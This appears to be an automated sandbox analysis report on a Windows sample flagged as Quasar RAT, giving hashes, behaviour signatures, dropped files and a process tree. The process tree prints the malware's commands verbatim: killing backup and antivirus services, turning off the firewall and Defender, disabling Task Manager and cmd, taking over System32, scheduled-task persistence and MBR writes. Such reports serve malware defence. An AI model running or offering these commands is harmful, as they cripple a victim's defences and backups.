Analysis

  • max time kernel
    160s
  • max time network
    135s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags

    arch:x64 arch:x86 image:win7-20230831-en locale:en-us os:windows7-x64 system
  • submitted
    11/10/2023, 05:39

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    456917c4f5c2843f8dad38d227ecf0c2

  • SHA1

    de949b64553dd28524f6ae722a939541ada85f1f

  • SHA256

    2e724b4185329154ed2e90817cf2cb30e94c31803385d0d77d97a35bedeea057

  • SHA512

    8fe19aec29f4e1112374b6c1ebf354130cde6cf945fda0ba25a765bec1b031b0e3fcfcf7fbffff1d1e0432059bd668f1dc39770bbcef7345a3ddb4bdc69968a7

  • SSDEEP

    98304:IKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:p4xRBjgB7j4U6gl

Malware Config

Extracted

Family

quasar

Attributes
  • encryption_key

    KCU\Software\Microsoft\Windows\Curr

  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies Windows Firewall 1 TTPs 5 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 6 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 42 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Drops startup file
    • Loads dropped DLL
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2072
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:2684
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:2832
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:2496
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:2476
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        PID:2164
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
          PID:2476
            • C:\Windows\system32\takeown.exe
              takeown /f C:\Windows\System32
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              • Suspicious use of AdjustPrivilegeToken
              PID:2376
            • C:\Windows\system32\icacls.exe
              icacls C:\Windows\System32 /grant "Admin:F"
              4⤵
              • Possible privilege escalation attempt
              • Modifies file permissions
              PID:2400
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecAgentBrowser*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2564
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecDiveciMediaService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecJobEngine*
            3⤵
            • Kills process with taskkill
            PID:2816
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecManagementService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1748
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM vss*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2944
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sql*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2572
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM svc$*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1148
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM memtas*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:856
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sophos*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2356
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2948
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM backup*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:648
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxVss*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2464
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxBlr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1860
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxFWD*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1308
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxCVD*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:540
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM GxCIMgr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2860
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM DefWatch*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2004
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM ccEvtMgr*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2652
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM SavRoam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:748
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM RTVscan*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2248
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM QBFCService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM Intuit.QuickBooks.FCS*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2220
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM YooBackup*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1236
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM YooIT*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:864
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM zhudongfangyu*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1704
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM sophos*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1760
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM stc_raw_agent*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2172
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VSNAPVSS*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1580
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM QBCFMonitorService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1600
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamTransportSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2076
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamDeploymentService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2708
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM VeeamNFSSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2764
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM veeam*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2672
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM PDVFSService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2836
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecVSSProvider*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2528
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecAgentAccelerator*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2520
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM BackupExecRPCService*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2736
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM AcrSch2Svc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1800
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM AcronisAgent*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2396
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM CASAD2DWebSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1028
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM CAARCUpdateSvc*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:2448
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM TeamViewer*
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1340
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:476
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set allprofiles state off
            3⤵
            • Modifies Windows Firewall
            PID:1300
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set currentprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:2404
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set domainprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:1752
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set privateprofile state off
            3⤵
            • Modifies Windows Firewall
            • Suspicious use of AdjustPrivilegeToken
            PID:2816
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall set publicprofile state off
            3⤵
            • Modifies Windows Firewall
            PID:2576
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
            3⤵
            PID:1708
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
            3⤵
            • Modifies registry key
            PID:2956
          • C:\Windows\SysWOW64\reg.exe
            REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
            3⤵
            • Modifies registry key
            PID:1252
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionExtension .exe
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2152

        Downloads

        • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll

          Filesize

          111KB

          MD5

          b59b0f6193bcc7e78a3b2fc730196be3

          SHA1

          045469fec2df2a9c75b550984a0ed32db2e9f846

          SHA256

          003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

          SHA512

          73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

        • C:\Users\Admin\AppData\Roaming\boot.bin

          Filesize

          512B

          MD5

          89f33a6a15a162e2143df9d9fbfe7140

          SHA1

          0564134f891d34a8d70f34da5f2ad698780d5bf0

          SHA256

          80183480be2d892a1efbf34a0bbcdd7b7284018396f94d32ab6b9f756ee269e1

          SHA512

          fe7efbc80d7d6604cbcac08a1f8ae38ebfbb743715701b637c908aae27110d7b8ade98c764aa5a2ebfdf45d382f96b8b348016dbe9b9817f5695a637796467f0

        • C:\Users\Admin\AppData\Roaming\lm.exe

          Filesize

          39KB

          MD5

          86e3192ad129a388e4f0ac864e84df78

          SHA1

          70a2b1422b583c2d768a6f816905bc85687ced52

          SHA256

          4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

          SHA512

          f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

        • C:\Users\Admin\AppData\Roaming\mbr.exe

          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        • C:\Users\Admin\AppData\Roaming\settings.bat

          Filesize

          67B

          MD5

          a204d9e5059a5449af7af765d371d6ea

          SHA1

          cfc6f78545bdc6a1c82491500f1bacfb38bef28c

          SHA256

          d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

          SHA512

          d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

        • C:\Users\Admin\AppData\Roaming\svchost.exe

          Filesize

          41KB

          MD5

          84177654d8bbd32fe8132265e7a598ec

          SHA1

          73bbb239d1449b3af2d7f53614ba456c1add4c9a

          SHA256

          af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

          SHA512

          6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

        • C:\Users\Admin\AppData\Roaming\ucrtbased.dll

          Filesize

          1.4MB

          MD5

          ceeda0b23cdf173bf54f7841c8828b43

          SHA1

          1742f10b0c1d1281e5dec67a9f6659c8816738ad

          SHA256

          c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

          SHA512

          f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

        • \Users\Admin\AppData\Roaming\lm.exe

          Filesize

          39KB

          MD5

          86e3192ad129a388e4f0ac864e84df78

          SHA1

          70a2b1422b583c2d768a6f816905bc85687ced52

          SHA256

          4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

          SHA512

          f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

        • \Users\Admin\AppData\Roaming\mbr.exe

          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        • \Users\Admin\AppData\Roaming\mbr.exe

          Filesize

          101KB

          MD5

          00e306f18b8cc56f347f34a7ebaf7f9f

          SHA1

          2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

          SHA256

          ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

          SHA512

          2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

        • \Users\Admin\AppData\Roaming\svchost.exe

          Filesize

          41KB

          MD5

          84177654d8bbd32fe8132265e7a598ec

          SHA1

          73bbb239d1449b3af2d7f53614ba456c1add4c9a

          SHA256

          af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

          SHA512

          6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

        • \Users\Admin\AppData\Roaming\ucrtbased.dll

          Filesize

          1.4MB

          MD5

          ceeda0b23cdf173bf54f7841c8828b43

          SHA1

          1742f10b0c1d1281e5dec67a9f6659c8816738ad

          SHA256

          c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

          SHA512

          f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

        • \Users\Admin\AppData\Roaming\vcruntime140d.dll

          Filesize

          111KB

          MD5

          b59b0f6193bcc7e78a3b2fc730196be3

          SHA1

          045469fec2df2a9c75b550984a0ed32db2e9f846

          SHA256

          003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

          SHA512

          73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

        • memory/2072-2-0x0000000074200000-0x00000000748EE000-memory.dmp

          Filesize

          6.9MB

        • memory/2072-76-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

        • memory/2072-0-0x0000000074200000-0x00000000748EE000-memory.dmp

          Filesize

          6.9MB

        • memory/2072-73-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

        • memory/2072-1-0x0000000000070000-0x00000000018AC000-memory.dmp

          Filesize

          24.2MB

        • memory/2072-5-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

        • memory/2072-4-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

        • memory/2072-3-0x00000000065E0000-0x0000000006620000-memory.dmp

          Filesize

          256KB

        • memory/2152-86-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

        • memory/2152-84-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

        • memory/2152-96-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

        • memory/2152-94-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

        • memory/2152-93-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

        • memory/2152-92-0x00000000028A0000-0x00000000028E0000-memory.dmp

          Filesize

          256KB

        • memory/2152-91-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

        • memory/2152-90-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

        • memory/2152-85-0x000000006DEE0000-0x000000006E48B000-memory.dmp

          Filesize

          5.7MB

        • memory/2164-81-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

        • memory/2164-79-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

        • memory/2164-89-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

        • memory/2164-77-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2164-74-0x000000001A680000-0x000000001A700000-memory.dmp

          Filesize

          512KB

        • memory/2164-42-0x000007FEF51C0000-0x000007FEF5BAC000-memory.dmp

          Filesize

          9.9MB

        • memory/2164-41-0x0000000000210000-0x0000000000220000-memory.dmp

          Filesize

          64KB

        • memory/2496-36-0x0000000000400000-0x0000000000423000-memory.dmp

          Filesize

          140KB

        • memory/2620-15-0x0000000000170000-0x0000000000190000-memory.dmp

          Filesize

          128KB

        • memory/2832-17-0x0000000000140000-0x0000000000160000-memory.dmp

          Filesize

          128KB

        • memory/2832-25-0x0000000000140000-0x0000000000160000-memory.dmp

          Filesize

          128KB